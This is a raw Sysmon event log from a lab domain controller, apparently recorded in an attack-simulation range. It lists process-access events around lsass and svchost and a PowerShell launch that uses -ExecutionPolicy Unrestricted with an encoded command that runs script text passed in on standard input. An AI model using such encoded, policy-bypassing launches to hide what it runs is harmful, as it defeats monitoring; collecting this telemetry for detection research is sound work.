11:59:56.372{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-643C-6064-CA02-00000000AD01}4940C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000276Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000275Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000274Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643C-6064-CA02-00000000AD01}4940C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000273Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000272Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.372{266CAFBE-643C-6064-C902-00000000AD01}38844988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-643C-6064-CA02-00000000AD01}4940C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e8150069(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d34f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e809b42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e759009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75f3b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d59b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75c66d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d3c13(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d37e0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d34f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75d312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e809b42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75b83d8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+e75b794a(wow64) 154100x8000000000000000271Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.377{266CAFBE-643C-6064-CA02-00000000AD01}4940C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000270Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.309{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000269Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.309{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x8000000000000000268Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 11:59:56.278{266CAFBE-643C-6064-C902-00000000AD01}3884\PSHost.132616655962207645.3884.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000267Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.278{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_imetegcr.d3l.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000266Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.278{266CAFBE-643C-6064-C902-00000000AD01}3884ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vuh5ktuc.biw.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000265Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.262{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_vuh5ktuc.biw.ps12021-03-31 11:59:56.262 10341000x8000000000000000264Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.247{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000263Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-643C-6064-C902-00000000AD01}3884C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:56.215{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 